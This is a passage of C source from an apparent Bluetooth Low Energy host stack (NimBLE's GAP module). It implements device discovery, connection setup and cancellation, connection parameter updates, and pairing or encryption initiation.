#if NIMBLE_BLE_SCAN
#if MYNEWT_VAL(BLE_EXT_ADV)
    struct ble_gap_ext_disc_params p = {0};

    p.itvl = disc_params->itvl;
    p.passive = disc_params->passive;
    p.window = disc_params->window;

    if (duration_ms == BLE_HS_FOREVER) {
        duration_ms = 0;
    } else if (duration_ms == 0) {
        duration_ms = BLE_GAP_DISC_DUR_DFLT;
    }

    return ble_gap_ext_disc(own_addr_type, duration_ms / 10, 0,
                            disc_params->filter_duplicates,
                            disc_params->filter_policy, disc_params->limited,
                            &p, NULL, cb, cb_arg);
#else
    struct ble_gap_disc_params params;
    uint32_t duration_ticks = 0;
    int rc;

    STATS_INC(ble_gap_stats, discover);

    ble_hs_lock();

    /* Make a copy of the parameter structure and fill unspecified values with
     * defaults.
     */
    params = *disc_params;
    ble_gap_disc_fill_dflts(&params);

    rc = ble_gap_disc_validate(own_addr_type, &params);
    if (rc != 0) {
        goto done;
    }

    if (duration_ms == 0) {
        duration_ms = BLE_GAP_DISC_DUR_DFLT;
    }

    if (duration_ms != BLE_HS_FOREVER) {
        rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks);
        if (rc != 0) {
            /* Duration too great. */
            rc = BLE_HS_EINVAL;
            goto done;
        }
    }

    if (!params.passive) {
        rc = ble_hs_id_use_addr(own_addr_type);
        if (rc != 0) {
            goto done;
        }
    }

    ble_gap_master.disc.limited = params.limited;
    ble_gap_master.cb = cb;
    ble_gap_master.cb_arg = cb_arg;

    BLE_HS_LOG(INFO, "GAP procedure initiated: discovery; ");
    ble_gap_log_disc(own_addr_type, duration_ms, &params);
    BLE_HS_LOG(INFO, "\n");

    rc = ble_gap_disc_tx_params(own_addr_type, &params);
    if (rc != 0) {
        goto done;
    }

    ble_gap_master.op = BLE_GAP_OP_M_DISC;

    rc = ble_gap_disc_enable_tx(1, params.filter_duplicates);
    if (rc != 0) {
        ble_gap_master_reset_state();
        goto done;
    }

    if (duration_ms != BLE_HS_FOREVER) {
        ble_gap_master_set_timer(duration_ticks);
    }

    rc = 0;

done:
    ble_hs_unlock();

    if (rc != 0) {
        STATS_INC(ble_gap_stats, discover_fail);
    }
    return rc;
#endif
#else
    return BLE_HS_ENOTSUP;
#endif
}

int
ble_gap_disc_active(void)
{
    /* Assume read is atomic; mutex not necessary.
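     * Callers may therefore poll this from any task without acquiring the
     * host mutex.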
*/ return ble_gap_master.op == BLE_GAP_OP_M_DISC; } #if MYNEWT_VAL(BLE_ROLE_CENTRAL) && !MYNEWT_VAL(BLE_EXT_ADV) /***************************************************************************** * $connection establishment procedures * *****************************************************************************/ static int ble_gap_conn_create_tx(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_conn_params *params) { struct ble_hci_le_create_conn_cp cmd; uint16_t opcode; cmd.scan_itvl = htole16(params->scan_itvl); cmd.scan_window = htole16(params->scan_window); if (peer_addr == NULL) { /* Application wants to connect to any device in the white list. The * peer address type and peer address fields are ignored by the * controller; fill them with dummy values. */ cmd.filter_policy = BLE_HCI_CONN_FILT_USE_WL; cmd.peer_addr_type = 0; memset(cmd.peer_addr, 0, sizeof(cmd.peer_addr)); } else { cmd.filter_policy = BLE_HCI_CONN_FILT_NO_WL; cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, sizeof(cmd.peer_addr)); } cmd.own_addr_type = own_addr_type; cmd.min_conn_itvl = htole16(params->itvl_min); cmd.max_conn_itvl = htole16(params->itvl_max); cmd.conn_latency = htole16(params->latency); cmd.tmo = htole16(params->supervision_timeout); cmd.min_ce = htole16(params->min_ce_len); cmd.max_ce = htole16(params->max_ce_len); opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CREATE_CONN); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } #endif #if MYNEWT_VAL(BLE_EXT_ADV) #if MYNEWT_VAL(BLE_ROLE_CENTRAL) static int ble_gap_check_conn_params(uint8_t phy, const struct ble_gap_conn_params *params) { if (phy != BLE_HCI_LE_PHY_2M) { /* Check scan interval and window */ if ((params->scan_itvl < BLE_HCI_SCAN_ITVL_MIN) || (params->scan_itvl > BLE_HCI_SCAN_ITVL_MAX) || (params->scan_window < BLE_HCI_SCAN_WINDOW_MIN) || (params->scan_window > BLE_HCI_SCAN_WINDOW_MAX) || (params->scan_itvl < params->scan_window)) { return BLE_ERR_INV_HCI_CMD_PARMS; } } /* Check connection interval min */ if ((params->itvl_min < BLE_HCI_CONN_ITVL_MIN) || (params->itvl_min > BLE_HCI_CONN_ITVL_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection interval max */ if ((params->itvl_max < BLE_HCI_CONN_ITVL_MIN) || (params->itvl_max > BLE_HCI_CONN_ITVL_MAX) || (params->itvl_max < params->itvl_min)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection latency */ if ((params->latency < BLE_HCI_CONN_LATENCY_MIN) || (params->latency > BLE_HCI_CONN_LATENCY_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check supervision timeout */ if ((params->supervision_timeout < BLE_HCI_CONN_SPVN_TIMEOUT_MIN) || (params->supervision_timeout > BLE_HCI_CONN_SPVN_TIMEOUT_MAX)) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check connection event length */ if (params->min_ce_len > params->max_ce_len) { return BLE_ERR_INV_HCI_CMD_PARMS; } return 0; } static int ble_gap_ext_conn_create_tx( uint8_t own_addr_type, const ble_addr_t *peer_addr, uint8_t phy_mask, const struct ble_gap_conn_params *phy_1m_conn_params, const struct ble_gap_conn_params *phy_2m_conn_params, const struct ble_gap_conn_params *phy_coded_conn_params) { struct ble_hci_le_ext_create_conn_cp *cmd; struct conn_params *params; uint8_t buf[sizeof(*cmd) + 3 * sizeof(*params)]; uint8_t len = sizeof(*cmd); int rc; /* Check own addr type */ if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (phy_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return 
BLE_ERR_INV_HCI_CMD_PARMS;
    }

    cmd = (void *) buf;
    params = cmd->conn_params;

    if (peer_addr == NULL) {
        /* Application wants to connect to any device in the white list.  The
         * peer address type and peer address fields are ignored by the
         * controller; fill them with dummy values.
         */
        cmd->filter_policy = BLE_HCI_CONN_FILT_USE_WL;
        cmd->peer_addr_type = 0;
        memset(cmd->peer_addr, 0, sizeof(cmd->peer_addr));
    } else {
        /* Check peer addr type */
        if (peer_addr->type > BLE_HCI_CONN_PEER_ADDR_MAX) {
            return BLE_ERR_INV_HCI_CMD_PARMS;
        }

        cmd->filter_policy = BLE_HCI_CONN_FILT_NO_WL;
        cmd->peer_addr_type = peer_addr->type;
        memcpy(cmd->peer_addr, peer_addr->val, sizeof(cmd->peer_addr));
    }

    cmd->own_addr_type = own_addr_type;
    cmd->init_phy_mask = phy_mask;

    if (phy_mask & BLE_GAP_LE_PHY_1M_MASK) {
        rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_1M, phy_1m_conn_params);
        if (rc) {
            return rc;
        }

        params->scan_itvl = htole16(phy_1m_conn_params->scan_itvl);
        params->scan_window = htole16(phy_1m_conn_params->scan_window);
        params->conn_min_itvl = htole16(phy_1m_conn_params->itvl_min);
        params->conn_max_itvl = htole16(phy_1m_conn_params->itvl_max);
        params->conn_latency = htole16(phy_1m_conn_params->latency);
        params->supervision_timeout =
            htole16(phy_1m_conn_params->supervision_timeout);
        params->min_ce = htole16(phy_1m_conn_params->min_ce_len);
        params->max_ce = htole16(phy_1m_conn_params->max_ce_len);

        params++;
        len += sizeof(*params);
    }

    if (phy_mask & BLE_GAP_LE_PHY_2M_MASK) {
        rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_2M, phy_2m_conn_params);
        if (rc) {
            return rc;
        }

        params->scan_itvl = htole16(phy_2m_conn_params->scan_itvl);
        params->scan_window = htole16(phy_2m_conn_params->scan_window);
        params->conn_min_itvl = htole16(phy_2m_conn_params->itvl_min);
        params->conn_max_itvl = htole16(phy_2m_conn_params->itvl_max);
        params->conn_latency = htole16(phy_2m_conn_params->latency);
        params->supervision_timeout =
            htole16(phy_2m_conn_params->supervision_timeout);
        params->min_ce = htole16(phy_2m_conn_params->min_ce_len);
        params->max_ce = htole16(phy_2m_conn_params->max_ce_len);

        params++;
        len += sizeof(*params);
    }

    if (phy_mask & BLE_GAP_LE_PHY_CODED_MASK) {
        rc = ble_gap_check_conn_params(BLE_HCI_LE_PHY_CODED,
                                       phy_coded_conn_params);
        if (rc) {
            return rc;
        }

        params->scan_itvl = htole16(phy_coded_conn_params->scan_itvl);
        params->scan_window = htole16(phy_coded_conn_params->scan_window);
        params->conn_min_itvl = htole16(phy_coded_conn_params->itvl_min);
        params->conn_max_itvl = htole16(phy_coded_conn_params->itvl_max);
        params->conn_latency = htole16(phy_coded_conn_params->latency);
        params->supervision_timeout =
            htole16(phy_coded_conn_params->supervision_timeout);
        params->min_ce = htole16(phy_coded_conn_params->min_ce_len);
        params->max_ce = htole16(phy_coded_conn_params->max_ce_len);

        params++;
        len += sizeof(*params);
    }

    return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE,
                                        BLE_HCI_OCF_LE_EXT_CREATE_CONN),
                             cmd, len, NULL, 0);
}
#endif

/**
 * Initiates a connect procedure.
 *
 * @param own_addr_type         The type of address the stack should use for
 *                                  itself during connection establishment.
 *                                      o BLE_OWN_ADDR_PUBLIC
 *                                      o BLE_OWN_ADDR_RANDOM
 *                                      o BLE_OWN_ADDR_RPA_PUBLIC_DEFAULT
 *                                      o BLE_OWN_ADDR_RPA_RANDOM_DEFAULT
 * @param peer_addr             The address of the peer to connect to.
 *                                  If this parameter is NULL, the white list
 *                                  is used.
 * @param duration_ms           The duration of the connect procedure.  On
 *                                  expiration, the connection attempt is
 *                                  cancelled and the timeout is reported
 *                                  through the connect event.
 *                                  Units are milliseconds.
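 *                                  Pass BLE_HS_FOREVER for no expiration.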
 * @param phy_mask              Defines the PHYs on which the connection
 *                                  attempt should be made.
 * @param phy_1m_conn_params    Additional arguments specifying the
 *                                  particulars of the connect procedure.  When
 *                                  BLE_GAP_LE_PHY_1M_MASK is set in phy_mask,
 *                                  this parameter can be set to NULL for
 *                                  default values.
 * @param phy_2m_conn_params    Additional arguments specifying the
 *                                  particulars of the connect procedure.  When
 *                                  BLE_GAP_LE_PHY_2M_MASK is set in phy_mask,
 *                                  this parameter can be set to NULL for
 *                                  default values.
 * @param phy_coded_conn_params Additional arguments specifying the
 *                                  particulars of the connect procedure.  When
 *                                  BLE_GAP_LE_PHY_CODED_MASK is set in
 *                                  phy_mask, this parameter can be set to
 *                                  NULL for default values.
 * @param cb                    The callback to associate with this connect
 *                                  procedure.  When the connect procedure
 *                                  completes, the result is reported through
 *                                  this callback.  If the connect procedure
 *                                  succeeds, the connection inherits this
 *                                  callback as its event-reporting mechanism.
 * @param cb_arg                The optional argument to pass to the callback
 *                                  function.
 *
 * @return                      0 on success;
 *                              BLE_HS_EALREADY if a connection attempt is
 *                                  already in progress;
 *                              BLE_HS_EBUSY if initiating a connection is not
 *                                  possible because scanning is in progress;
 *                              BLE_HS_EDONE if the specified peer is already
 *                                  connected;
 *                              Other nonzero on error.
 */
int
ble_gap_ext_connect(uint8_t own_addr_type, const ble_addr_t *peer_addr,
                    int32_t duration_ms, uint8_t phy_mask,
                    const struct ble_gap_conn_params *phy_1m_conn_params,
                    const struct ble_gap_conn_params *phy_2m_conn_params,
                    const struct ble_gap_conn_params *phy_coded_conn_params,
                    ble_gap_event_fn *cb, void *cb_arg)
{
#if MYNEWT_VAL(BLE_ROLE_CENTRAL)
    ble_npl_time_t duration_ticks;
    int rc;

    STATS_INC(ble_gap_stats, initiate);

    ble_hs_lock();

    if (ble_gap_conn_active()) {
        rc = BLE_HS_EALREADY;
        goto done;
    }

    if (ble_gap_disc_active()) {
        rc = BLE_HS_EBUSY;
        goto done;
    }

    if (!ble_hs_is_enabled()) {
        /* Use the common exit path so the host mutex is released. */
        rc = BLE_HS_EDISABLED;
        goto done;
    }

    if (ble_gap_is_preempted()) {
        rc = BLE_HS_EPREEMPTED;
        goto done;
    }

    if (!ble_hs_conn_can_alloc()) {
        rc = BLE_HS_ENOMEM;
        goto done;
    }

    if (peer_addr &&
        peer_addr->type != BLE_ADDR_PUBLIC &&
        peer_addr->type != BLE_ADDR_RANDOM &&
        peer_addr->type != BLE_ADDR_PUBLIC_ID &&
        peer_addr->type != BLE_ADDR_RANDOM_ID) {
        rc = BLE_HS_EINVAL;
        goto done;
    }

    if ((phy_mask & BLE_GAP_LE_PHY_1M_MASK) && phy_1m_conn_params == NULL) {
        phy_1m_conn_params = &ble_gap_conn_params_dflt;
    }

    if ((phy_mask & BLE_GAP_LE_PHY_2M_MASK) && phy_2m_conn_params == NULL) {
        phy_2m_conn_params = &ble_gap_conn_params_dflt;
    }

    if ((phy_mask & BLE_GAP_LE_PHY_CODED_MASK) &&
        phy_coded_conn_params == NULL) {
        phy_coded_conn_params = &ble_gap_conn_params_dflt;
    }

    if (duration_ms == 0) {
        duration_ms = BLE_GAP_CONN_DUR_DFLT;
    }

    if (duration_ms != BLE_HS_FOREVER) {
        rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks);
        if (rc != 0) {
            /* Duration too great. */
            rc = BLE_HS_EINVAL;
            goto done;
        }
    }

    /* Verify peer not already connected. */
    if (ble_hs_conn_find_by_addr(peer_addr) != NULL) {
        rc = BLE_HS_EDONE;
        goto done;
    }

    /* XXX: Verify conn_params.
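     * Note: the per-PHY connection parameters are validated later, in
     * ble_gap_ext_conn_create_tx() via ble_gap_check_conn_params().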
*/ rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; ble_gap_master.conn.using_wl = peer_addr == NULL; ble_gap_master.conn.our_addr_type = own_addr_type; ble_gap_master.op = BLE_GAP_OP_M_CONN; rc = ble_gap_ext_conn_create_tx(own_addr_type, peer_addr, phy_mask, phy_1m_conn_params, phy_2m_conn_params, phy_coded_conn_params); if (rc != 0) { ble_gap_master_reset_state(); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_master_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, initiate_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } #endif int ble_gap_connect(uint8_t own_addr_type, const ble_addr_t *peer_addr, int32_t duration_ms, const struct ble_gap_conn_params *conn_params, ble_gap_event_fn *cb, void *cb_arg) { #if MYNEWT_VAL(BLE_ROLE_CENTRAL) #if MYNEWT_VAL(BLE_EXT_ADV) return ble_gap_ext_connect(own_addr_type, peer_addr, duration_ms, BLE_GAP_LE_PHY_1M_MASK, conn_params, NULL, NULL, cb, cb_arg); #else uint32_t duration_ticks; int rc; STATS_INC(ble_gap_stats, initiate); ble_hs_lock(); if (ble_gap_conn_active()) { rc = BLE_HS_EALREADY; goto done; } if (ble_gap_disc_active()) { rc = BLE_HS_EBUSY; goto done; } if (!ble_hs_is_enabled()) { rc = BLE_HS_EDISABLED; goto done; } if (ble_gap_is_preempted()) { rc = BLE_HS_EPREEMPTED; goto done; } if (!ble_hs_conn_can_alloc()) { rc = BLE_HS_ENOMEM; goto done; } if (peer_addr && peer_addr->type != BLE_ADDR_PUBLIC && peer_addr->type != BLE_ADDR_RANDOM && peer_addr->type != BLE_ADDR_PUBLIC_ID && peer_addr->type != BLE_ADDR_RANDOM_ID) { rc = BLE_HS_EINVAL; goto done; } if (conn_params == NULL) { conn_params = &ble_gap_conn_params_dflt; } if (duration_ms == 0) { duration_ms = BLE_GAP_CONN_DUR_DFLT; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } /* Verify peer not already connected. */ if (ble_hs_conn_find_by_addr(peer_addr) != NULL) { rc = BLE_HS_EDONE; goto done; } /* XXX: Verify conn_params. */ rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: connect; "); ble_gap_log_conn(own_addr_type, peer_addr, conn_params); BLE_HS_LOG(INFO, "\n"); ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; ble_gap_master.conn.using_wl = peer_addr == NULL; ble_gap_master.conn.our_addr_type = own_addr_type; ble_gap_master.op = BLE_GAP_OP_M_CONN; rc = ble_gap_conn_create_tx(own_addr_type, peer_addr, conn_params); if (rc != 0) { ble_gap_master_reset_state(); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_master_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, initiate_fail); } return rc; #endif #else return BLE_HS_ENOTSUP; #endif } int ble_gap_conn_active(void) { /* Assume read is atomic; mutex not necessary. 
*/ return ble_gap_master.op == BLE_GAP_OP_M_CONN; } /***************************************************************************** * $terminate connection procedure * *****************************************************************************/ int ble_gap_terminate_with_conn(struct ble_hs_conn *conn, uint8_t hci_reason) { struct ble_hci_lc_disconnect_cp cmd; int rc; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); if (conn->bhc_flags & BLE_HS_CONN_F_TERMINATING) { return BLE_HS_EALREADY; } BLE_HS_LOG(INFO, "GAP procedure initiated: terminate connection; " "conn_handle=%d hci_reason=%d\n", conn->bhc_handle, hci_reason); cmd.conn_handle = htole16(conn->bhc_handle); cmd.reason = hci_reason; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LINK_CTRL, BLE_HCI_OCF_DISCONNECT_CMD), &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { return rc; } conn->bhc_flags |= BLE_HS_CONN_F_TERMINATING; return 0; } int ble_gap_terminate(uint16_t conn_handle, uint8_t hci_reason) { struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, terminate); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn == NULL) { rc = BLE_HS_ENOTCONN; goto done; } rc = ble_gap_terminate_with_conn(conn, hci_reason); done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, terminate_fail); } return rc; } /***************************************************************************** * $cancel * *****************************************************************************/ static int ble_gap_conn_cancel_tx(void) { int rc; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CREATE_CONN_CANCEL), NULL, 0, NULL, 0); if (rc != 0) { return rc; } return 0; } #if NIMBLE_BLE_CONNECT static int ble_gap_conn_cancel_no_lock(void) { int rc; STATS_INC(ble_gap_stats, cancel); if (!ble_gap_conn_active()) { rc = BLE_HS_EALREADY; goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: cancel connection\n"); rc = ble_gap_conn_cancel_tx(); if (rc != 0) { goto done; } ble_gap_master.conn.cancel = 1; rc = 0; done: if (rc != 0) { STATS_INC(ble_gap_stats, cancel_fail); } return rc; } #endif int ble_gap_conn_cancel(void) { #if MYNEWT_VAL(BLE_ROLE_CENTRAL) int rc; ble_hs_lock(); rc = ble_gap_conn_cancel_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $update connection parameters * *****************************************************************************/ #if NIMBLE_BLE_CONNECT static struct ble_gap_update_entry * ble_gap_update_entry_alloc(void) { struct ble_gap_update_entry *entry; entry = os_memblock_get(&ble_gap_update_entry_pool); if (entry != NULL) { memset(entry, 0, sizeof *entry); } return entry; } #endif static void ble_gap_update_entry_free(struct ble_gap_update_entry *entry) { int rc; if (entry != NULL) { #if MYNEWT_VAL(BLE_HS_DEBUG) memset(entry, 0xff, sizeof *entry); #endif rc = os_memblock_put(&ble_gap_update_entry_pool, entry); BLE_HS_DBG_ASSERT_EVAL(rc == 0); } } static struct ble_gap_update_entry * ble_gap_update_entry_find(uint16_t conn_handle, struct ble_gap_update_entry **out_prev) { struct ble_gap_update_entry *entry; struct ble_gap_update_entry *prev; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); prev = NULL; SLIST_FOREACH(entry, &ble_gap_update_entries, next) { if (entry->conn_handle == conn_handle) { break; } prev = entry; } if (out_prev != NULL) { *out_prev = prev; } return entry; } static struct ble_gap_update_entry * ble_gap_update_entry_remove(uint16_t conn_handle) { struct ble_gap_update_entry 
*entry; struct ble_gap_update_entry *prev; entry = ble_gap_update_entry_find(conn_handle, &prev); if (entry != NULL) { if (prev == NULL) { SLIST_REMOVE_HEAD(&ble_gap_update_entries, next); } else { SLIST_NEXT(prev, next) = SLIST_NEXT(entry, next); } ble_hs_timer_resched(); } return entry; } #if NIMBLE_BLE_CONNECT static void ble_gap_update_l2cap_cb(uint16_t conn_handle, int status, void *arg) { struct ble_gap_update_entry *entry; /* Report failures and rejections. Success gets reported when the * controller sends the connection update complete event. */ ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); if (entry != NULL) { ble_gap_update_entry_free(entry); if (status != 0) { ble_gap_update_notify(conn_handle, status); } /* On success let's wait for the controller to notify about update */ } } static int ble_gap_tx_param_pos_reply(uint16_t conn_handle, struct ble_gap_upd_params *params) { struct ble_hci_le_rem_conn_param_rr_cp cmd; cmd.conn_handle = htole16(conn_handle); cmd.conn_itvl_min = htole16(params->itvl_min); cmd.conn_itvl_max = htole16(params->itvl_max); cmd.conn_latency = htole16(params->latency); cmd.supervision_timeout = htole16(params->supervision_timeout); cmd.min_ce = htole16(params->min_ce_len); cmd.max_ce = htole16(params->max_ce_len); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_CONN_PARAM_RR), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_tx_param_neg_reply(uint16_t conn_handle, uint8_t reject_reason) { struct ble_hci_le_rem_conn_params_nrr_cp cmd; cmd.conn_handle = htole16(conn_handle); cmd.reason = reject_reason; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_CONN_PARAM_NRR), &cmd, sizeof(cmd), NULL, 0); } #endif void ble_gap_rx_param_req(const struct ble_hci_ev_le_subev_rem_conn_param_req *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_upd_params peer_params; struct ble_gap_upd_params self_params; struct ble_gap_event event; uint16_t conn_handle; int rc; memset(&event, 0, sizeof event); peer_params.itvl_min = le16toh(ev->min_interval); peer_params.itvl_max = le16toh(ev->max_interval); peer_params.latency = le16toh(ev->latency); peer_params.supervision_timeout = le16toh(ev->timeout); peer_params.min_ce_len = 0; peer_params.max_ce_len = 0; /* Copy the peer params into the self params to make it easy on the * application. The application callback will change only the fields which * it finds unsuitable. 
 */
    self_params = peer_params;

    conn_handle = le16toh(ev->conn_handle);

    memset(&event, 0, sizeof event);
    event.type = BLE_GAP_EVENT_CONN_UPDATE_REQ;
    event.conn_update_req.conn_handle = conn_handle;
    event.conn_update_req.self_params = &self_params;
    event.conn_update_req.peer_params = &peer_params;

    rc = ble_gap_call_conn_event_cb(&event, conn_handle);
    if (rc == 0) {
        rc = ble_gap_tx_param_pos_reply(conn_handle, &self_params);
        if (rc != 0) {
            ble_gap_update_failed(conn_handle, rc);
        }
    } else {
        ble_gap_tx_param_neg_reply(conn_handle, rc);
    }
#endif
}

#if NIMBLE_BLE_CONNECT
static int
ble_gap_update_tx(uint16_t conn_handle,
                  const struct ble_gap_upd_params *params)
{
    struct ble_hci_le_conn_update_cp cmd;

    cmd.conn_handle = htole16(conn_handle);
    cmd.conn_itvl_min = htole16(params->itvl_min);
    cmd.conn_itvl_max = htole16(params->itvl_max);
    cmd.conn_latency = htole16(params->latency);
    cmd.supervision_timeout = htole16(params->supervision_timeout);
    cmd.min_ce_len = htole16(params->min_ce_len);
    cmd.max_ce_len = htole16(params->max_ce_len);

    return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE,
                                        BLE_HCI_OCF_LE_CONN_UPDATE),
                             &cmd, sizeof(cmd), NULL, 0);
}

static bool
ble_gap_validate_conn_params(const struct ble_gap_upd_params *params)
{
    /* Requirements from Bluetooth spec. v4.2 [Vol 2, Part E], 7.8.18 */
    if (params->itvl_min > params->itvl_max) {
        return false;
    }

    if (params->itvl_min < 0x0006 || params->itvl_max > 0x0C80) {
        return false;
    }

    if (params->latency > 0x01F3) {
        return false;
    }

    /* According to the specification mentioned above, we should make sure
     * that:
     * supervision_timeout_ms > (1 + latency) * 2 * max_interval_ms
     *    =>
     * supervision_timeout * 10 ms > (1 + latency) * 2 * itvl_max * 1.25 ms
     *    =>
     * supervision_timeout > (1 + latency) * itvl_max / 4
     */
    if (params->supervision_timeout <=
                   (((1 + params->latency) * params->itvl_max) / 4)) {
        return false;
    }

    return true;
}
#endif

int
ble_gap_update_params(uint16_t conn_handle,
                      const struct ble_gap_upd_params *params)
{
#if NIMBLE_BLE_CONNECT
    struct ble_l2cap_sig_update_params l2cap_params;
    struct ble_gap_update_entry *entry;
    struct ble_gap_update_entry *dup;
    struct ble_hs_conn *conn;
    int l2cap_update;
    int rc;

    l2cap_update = 0;

    /* Validate parameters against the spec */
    if (!ble_gap_validate_conn_params(params)) {
        return BLE_HS_EINVAL;
    }

    STATS_INC(ble_gap_stats, update);
    memset(&l2cap_params, 0, sizeof l2cap_params);
    entry = NULL;

    ble_hs_lock();

    conn = ble_hs_conn_find(conn_handle);
    if (conn == NULL) {
        rc = BLE_HS_ENOTCONN;
        goto done;
    }

    /* Don't allow two concurrent updates to the same connection. */
    dup = ble_gap_update_entry_find(conn_handle, NULL);
    if (dup != NULL) {
        rc = BLE_HS_EALREADY;
        goto done;
    }

    entry = ble_gap_update_entry_alloc();
    if (entry == NULL) {
        rc = BLE_HS_ENOMEM;
        goto done;
    }

    entry->conn_handle = conn_handle;
    entry->params = *params;

    entry->exp_os_ticks = ble_npl_time_get() +
                          ble_npl_time_ms_to_ticks32(BLE_GAP_UPDATE_TIMEOUT_MS);

    BLE_HS_LOG(INFO, "GAP procedure initiated: ");
    ble_gap_log_update(conn_handle, params);
    BLE_HS_LOG(INFO, "\n");

    /*
     * If the LL update procedure is not supported on this connection and we
     * are the slave, fall back to the L2CAP update procedure.
*/ if ((conn->supported_feat & BLE_HS_HCI_LE_FEAT_CONN_PARAM_REQUEST) == 0 && !(conn->bhc_flags & BLE_HS_CONN_F_MASTER)) { l2cap_update = 1; rc = 0; } else { rc = ble_gap_update_tx(conn_handle, params); } done: ble_hs_unlock(); if (!l2cap_update) { ble_hs_timer_resched(); } else { ble_gap_update_to_l2cap(params, &l2cap_params); rc = ble_l2cap_sig_update(conn_handle, &l2cap_params, ble_gap_update_l2cap_cb, NULL); } ble_hs_lock(); if (rc == 0) { SLIST_INSERT_HEAD(&ble_gap_update_entries, entry, next); } else { ble_gap_update_entry_free(entry); STATS_INC(ble_gap_stats, update_fail); } ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $security * *****************************************************************************/ int ble_gap_security_initiate(uint16_t conn_handle) { #if NIMBLE_BLE_SM struct ble_store_value_sec value_sec; struct ble_store_key_sec key_sec; struct ble_hs_conn_addrs addrs; ble_hs_conn_flags_t conn_flags; struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, security_initiate); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { conn_flags = conn->bhc_flags; ble_hs_conn_addrs(conn, &addrs); memset(&key_sec, 0, sizeof key_sec); key_sec.peer_addr = addrs.peer_id_addr; } ble_hs_unlock(); if (conn == NULL) { rc = BLE_HS_ENOTCONN; goto done; } if (conn_flags & BLE_HS_CONN_F_MASTER) { /* Search the security database for an LTK for this peer. If one * is found, perform the encryption procedure rather than the pairing * procedure. */ rc = ble_store_read_peer_sec(&key_sec, &value_sec); if (rc == 0 && value_sec.ltk_present) { rc = ble_sm_enc_initiate(conn_handle, value_sec.key_size, value_sec.ltk, value_sec.ediv, value_sec.rand_num, value_sec.authenticated); if (rc != 0) { goto done; } } else { rc = ble_sm_pair_initiate(conn_handle); if (rc != 0) { goto done; } } } else { rc = ble_sm_slave_initiate(conn_handle); if (rc != 0) { goto done; } } rc = 0; done: if (rc != 0) { STATS_INC(ble_gap_stats, security_initiate_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_pair_initiate(uint16_t conn_handle) { int rc; rc = ble_sm_pair_initiate(conn_handle); return rc; } int ble_gap_encryption_initiate(uint16_t conn_handle, uint8_t key_size, const uint8_t *ltk, uint16_t ediv, uint64_t rand_val, int auth) { #if NIMBLE_BLE_SM ble_hs_conn_flags_t conn_flags; int rc; rc = ble_hs_atomic_conn_flags(conn_handle, &conn_flags); if (rc != 0) { return rc; } if (!(conn_flags & BLE_HS_CONN_F_MASTER)) { return BLE_HS_EROLE; } rc = ble_sm_enc_initiate(conn_handle, key_size, ltk, ediv, rand_val, auth); return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_unpair(const ble_addr_t *peer_addr) { struct ble_hs_conn *conn; if (ble_addr_cmp(peer_addr, BLE_ADDR_ANY) == 0) { return BLE_HS_EINVAL; } ble_hs_lock(); conn = ble_hs_conn_find_by_addr(peer_addr); if (conn != NULL) { ble_gap_terminate_with_conn(conn, BLE_ERR_REM_USER_CONN_TERM); } ble_hs_unlock(); 